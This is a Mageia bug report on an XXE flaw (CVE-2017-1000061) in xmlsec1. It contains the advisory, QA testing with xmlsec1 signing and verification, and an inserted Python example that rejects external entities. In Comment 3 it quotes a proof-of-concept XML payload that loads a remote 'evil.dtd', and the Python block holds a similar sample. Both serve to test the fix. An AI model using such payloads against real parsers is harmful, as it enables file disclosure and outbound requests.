Bug 26174 - xmlsec1 new security issue CVE-2017-1000061
Summary: xmlsec1 new security issue CVE-2017-1000061
Status: RESOLVED FIXED
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security
Version: 7
Hardware: All Linux
Priority: Normal major
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL:
Whiteboard: MGA7-64-OK
Keywords: advisory, validated_update
Depends on:
Blocks:
 
Reported: 2020-02-07 21:59 CET by David Walser
Modified: 2020-02-26 11:22 CET (History)

See Also:
Source RPM: xmlsec1-1.2.28-1.mga7.src.rpm
CVE:
Status comment:

Description David Walser 2020-02-07 21:59:56 CET
Fedora has issued an advisory on February 3:
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3PWHBRWXR3RNPHDSTQI6UWDG5ETOQ7VR/

The issue is fixed upstream in 1.2.29.

Mageia 7 is also affected.
David Walser 2020-02-07 22:00:09 CET

Whiteboard: (none) => MGA7TOO

Comment 1 David GEIGER 2020-02-08 08:35:04 CET
Done for both Cauldron and mga7!

CC: (none) => geiger.david68210

Comment 2 David Walser 2020-02-08 13:07:38 CET
Advisory:
========================

Updated xmlsec1 packages fix security vulnerability:

It was discovered xmlsec1's use of libxml2 inadvertently enabled external
entity expansion (XXE) along with validation. An attacker could craft an XML
file that would cause xmlsec1 to try and read local files or HTTP/FTP URLs,
leading to information disclosure or denial of service (CVE-2017-1000061).

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000061
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3PWHBRWXR3RNPHDSTQI6UWDG5ETOQ7VR/
========================

Updated packages in core/updates_testing:
========================
xmlsec1-1.2.29-1.mga7
libxmlsec1_1-1.2.29-1.mga7
libxmlsec1-openssl1-1.2.29-1.mga7
libxmlsec1-nss1-1.2.29-1.mga7
libxmlsec1-gnutls1-1.2.29-1.mga7
libxmlsec1-gcrypt1-1.2.29-1.mga7
libxmlsec1-devel-1.2.29-1.mga7

from xmlsec1-1.2.29-1.mga7.src.rpm

Whiteboard: MGA7TOO => (none)
Assignee: java => qa-bugs
Version: Cauldron => 7
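The advisory above describes the defect: libxml2 was allowed to resolve external entities (a remote DTD, a local file) while xmlsec1 parsed an untrusted document. The upstream fix installs an entity loader that refuses such fetches. The block below is an added example, not code from the Mageia update or the xmlsec project, showing the same defensive idea in the Python standard library: parse with expat, record every external DTD or entity reference the document declares, and refuse to fetch any of them. The sample inputs are constructed for the example (the hostname `example.invalid` is a placeholder, not the address from the bug report).

```python
"""Refuse XML documents that try to pull in external DTDs or entities.

Added, self-contained example (not part of the Mageia bug or of xmlsec):
a pre-check in the spirit of xmlsec's "no XXE" external entity loader,
built on the standard-library expat bindings.
"""
import xml.parsers.expat as expat


class ExternalEntityRejected(Exception):
    """Raised when the document references an external DTD or entity."""


def parse_without_xxe(xml_bytes: bytes) -> dict:
    """Parse XML with expat while refusing every external entity fetch.

    Returns a summary dict (root element name, whether a DOCTYPE was seen)
    for well-formed documents without external references, and raises
    ExternalEntityRejected as soon as a SYSTEM/PUBLIC identifier is
    declared or referenced. No file or URL is ever opened.
    """
    parser = expat.ParserCreate()
    summary = {"root": None, "doctype": False, "external_refs": []}

    # Without this flag expat silently skips external parameter entities
    # such as "%remote;", which would hide the attempt instead of reporting it.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)

    def start_doctype(name, sysid, pubid, has_internal_subset):
        # <!DOCTYPE root SYSTEM "..."> names an external DTD subset.
        summary["doctype"] = True
        if sysid or pubid:
            summary["external_refs"].append(sysid or pubid)

    def entity_decl(name, is_param, value, base, sysid, pubid, notation):
        # <!ENTITY x SYSTEM "..."> or <!ENTITY % x SYSTEM "..."> declares
        # an external (general or parameter) entity.
        if sysid or pubid:
            summary["external_refs"].append(sysid or pubid)

    def external_entity_ref(context, base, sysid, pubid):
        # expat asks us to load the entity; returning 0 aborts the parse
        # with XML_ERROR_EXTERNAL_ENTITY_HANDLING and fetches nothing.
        summary["external_refs"].append(sysid or pubid)
        return 0

    def start_element(name, attrs):
        if summary["root"] is None:
            summary["root"] = name

    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.StartElementHandler = start_element

    try:
        parser.Parse(xml_bytes, True)
    except expat.ExpatError:
        # A refused fetch surfaces as a parse error; report the real cause.
        if summary["external_refs"]:
            raise ExternalEntityRejected(
                "external reference refused: %s" % ", ".join(summary["external_refs"]))
        raise
    if summary["external_refs"]:
        raise ExternalEntityRejected(
            "external reference refused: %s" % ", ".join(summary["external_refs"]))
    return summary


# Constructed sample inputs (not taken from any real system).
XXE_POC = (b'<?xml version="1.0" encoding="UTF-8"?>'
           b'<!DOCTYPE root [ <!ENTITY % remote SYSTEM '
           b'"http://example.invalid/evil.dtd"> %remote;]>')
INTERNAL_ONLY = (b'<?xml version="1.0"?>'
                 b'<!DOCTYPE r [<!ENTITY greeting "hello">]><r>&greeting;</r>')
BENIGN = b'<?xml version="1.0"?><References><Book/></References>'


if __name__ == "__main__":
    print(parse_without_xxe(BENIGN))
    print(parse_without_xxe(INTERNAL_ONLY))
    try:
        parse_without_xxe(XXE_POC)
    except ExternalEntityRejected as exc:
        print("rejected:", exc)
```

Internal entities are still allowed (the second sample parses), so the check only blocks what the advisory describes: documents that make the parser reach out to a local file or a URL.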

Comment 3 Len Lawrence 2020-02-08 18:25:26 CET
Mageia7, x86_64

Before the update installing the devel package failed with this message:
The following packages can't be installed because they depend on packages
that are older than the installed ones:
lib64xslt-devel-1.1.33-2.1.mga7
lib64xmlsec1-devel-1.2.28-1.mga7

The others install OK.
Tried to run the PoC but had difficulties:
CVE-2017-1000061
https://github.com/lsh123/xmlsec/issues/43
$ cat input.xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.3.1/evil.dtd"> %remote;]>
$ xmlsec1 --verify --output /tmp/output.xml input.xml
....
Failed to find xmlsec-openssl library.

/usr/lib64/libxmlsec1-openssl.so.1.2.28 is installed.

Cannot unravel this.
And also, re lib64xmlsec1-devel, removing lib64xslt-devel would take 148 other packages with it.  Had hoped to reinstall it to pick up the correct package, assuming that the xslt one is the source of the problem.
$ urpmq --requires lib64xmlsec1-devel
....
pkgconfig(libxslt)[>= 1.0.20]

$ locate libxslt
/usr/lib64/libxslt.so.1.1.33

Why is it complaining?

Recursive query lists lib64xslt1
$ rpm -qa | grep lib64xslt1
lib64xslt1-1.1.33-2.2.mga7

CC: (none) => tarazed25

Len Lawrence 2020-02-09 12:58:56 CET

Keywords: (none) => feedback

David Walser 2020-02-21 17:43:48 CET

Assignee: qa-bugs => geiger.david68210
Keywords: feedback => (none)
CC: (none) => qa-bugs

David Walser 2020-02-21 17:56:22 CET

Status comment: (none) => Update built, but CLI tool fails to find its own library

Comment 4 David GEIGER 2020-02-22 09:35:45 CET
(In reply to Len Lawrence from comment #3)

> Failed to find xmlsec-openssl library.
> 
> /usr/lib64/libxmlsec1-openssl.so.1.2.28 is installed.


Shouldn't it be /usr/lib64/libxmlsec1-openssl.so.1.2.29 ??
Comment 5 David Walser 2020-02-22 15:02:04 CET
Len, did you ever actually test the update?
Comment 6 Len Lawrence 2020-02-23 17:34:16 CET
No.  I was waiting to resolve the missing dependency.  It looks like it was never installed so I have installed it now.  Don't ask.
Comment 7 Len Lawrence 2020-02-23 17:47:29 CET
@David Geiger: in reply to comment 4

It is all coming back into focus now.  It was the before-update situation which was the problem.  Testing the PoC against the 1.1.28 version failed because the xmlsec-openssl library could not be found even though libxmlsec1-openssl.so.1.2.28 was installed.  Why would it complain?

I felt uneasy about proceeding with testing in case something was seriously wrong.
Comment 8 David Walser 2020-02-23 18:01:18 CET
It's only a problem if something is wrong with the update.

Assignee: geiger.david68210 => qa-bugs
CC: qa-bugs => (none)
Status comment: Update built, but CLI tool fails to find its own library => (none)

Comment 9 Len Lawrence 2020-02-23 19:09:53 CET
Continuing from comment 3:

Updated the seven packages and ran the PoC.
$ xmlsec1 --verify --output /tmp/output.xml input.xml
func=xmlSecNoXxeExternalEntityLoader:file=xmlsec.c:line=59:obj=unknown:subj=xmlSecNoXxeExternalEntityLoader:error=5:libxml2 library function failed:illegal external entity='http://192.168.3.1/evil.dtd'; xml error: 0: NULL
input.xml:2: parser error : Start tag expected, '<' not found

^
func=xmlSecParseFile:file=parser.c:line=414:obj=unknown:subj=xmlParseDocument:error=5:libxml2 library function failed:filename=input.xml; xml error: 4: Start tag expected, '<' not found

Error: failed to parse xml file "input.xml"
Error: failed to load document "input.xml"
ERROR
SignedInfo References (ok/all): 0/0
Manifests References (ok/all): 0/0
Error: failed to verify file "input.xml"

This agrees with the upstream test but we have no "before" example to compare it with.

That is only half of the test anyway.  It needs a server on localhost to listen on port 80.  Don't know how to set that up.

Not knowing anything about this package it seemed appropriate to use the command from the PoC.
Tried a few local XML files but failed every time.
$ xmlsec1 --verify --output /tmp/output.xml workspace.xml
Error: failed to find default node with name="Signature"
Error: failed to load document "workspace.xml"
ERROR
SignedInfo References (ok/all): 0/0
Manifests References (ok/all): 0/0
Error: failed to verify file "workspace.xml"

The help indicates that verify refers to signed documents which these are not.  Fiddled with an XML file as data and tried to create a document with a default template signature with the --sign-tmpl option but that fell flat.
$ xmlsec1 -output test1.xml --sign-tmpl workspace.xml

Need to do more research.
Comment 10 Len Lawrence 2020-02-23 21:52:00 CET
Tried to verify various pem files found in the system.  These fail on missing start tag.  Looks like these are encrypted certificates.  Decrypting does not work.

Not making much headway with this.

The best I could do was to follow part of the tutorial at https://users.dcc.uchile.cl/~pcamacho/tutorial/web/xmlsec/xmlsec.html.

Copied down the files and:
$ xmlsec1 --sign --output doc-signed.xml --privkey-pem userkey.pem doc.xml
Enter password for "userkey.pem" file:
$ ls
cacert.pem  doc-signed.xml  doc.xml  pub-userkey.pem  usercert.p12  userkey.pem

The generated XML file doc-signed.xml corresponded with the example online.
$ cat doc-signed.xml
<?xml version="1.0"?>
<References>
 <Book>
  <Author>
   <FirstName>Bruce</FirstName>
    <LastName>Schneier</LastName>
  </Author>
  <Title>Applied Cryptography</Title>
[..]
</RSAKeyValue>
</KeyValue>
  </KeyInfo>
 </Signature>
</References>

$ xmlsec1 --verify doc-signed.xml
OK
SignedInfo References (ok/all): 1/1
Manifests References (ok/all): 0/0

Deliberately corrupted the Title and Signature and tried again.
$ xmlsec1 --verify doc-signed.xml
func=xmlSecOpenSSLEvpDigestVerify:file=digests.c:line=280:obj=sha1:subj=unknown:error=12:invalid data:data and digest do not match
FAIL
SignedInfo References (ok/all): 0/1
Manifests References (ok/all): 0/0
Error: failed to verify file "doc-signed.xml"

$ cp doc.xml doc-id.xml

Made a benign change to doc-id.xml, adding an id to the Book node.
$ xmlsec1 --sign --output doc-id-signed.xml --privkey-pem userkey.pem doc-id.xml
Enter password for "userkey.pem" file: 
$ ll doc-id-signed.xml
-rw-r--r-- 1 lcl lcl 1387 Feb 23 20:43 doc-id-signed.xml
$ xmlsec1 --verify doc-id-signed.xml
OK
SignedInfo References (ok/all): 1/1
Manifests References (ok/all): 0/0

There is more, but to avoid getting out of my depth I am sending this on.

Whiteboard: (none) => MGA7-64-OK

Comment 11 Thomas Andrews 2020-02-25 00:08:57 CET
Thank you for all your effort, Len. I'm going to go ahead and validate.

Advisory in Comment 2.

CC: (none) => andrewsfarm, sysadmin-bugs
Keywords: (none) => validated_update

Thomas Backlund 2020-02-26 10:39:37 CET

CC: (none) => tmb
Keywords: (none) => advisory

Comment 12 Mageia Robot 2020-02-26 11:22:16 CET
An update for this issue has been pushed to the Mageia Updates repository.

https://advisories.mageia.org/MGASA-2020-0104.html

Resolution: (none) => FIXED
Status: NEW => RESOLVED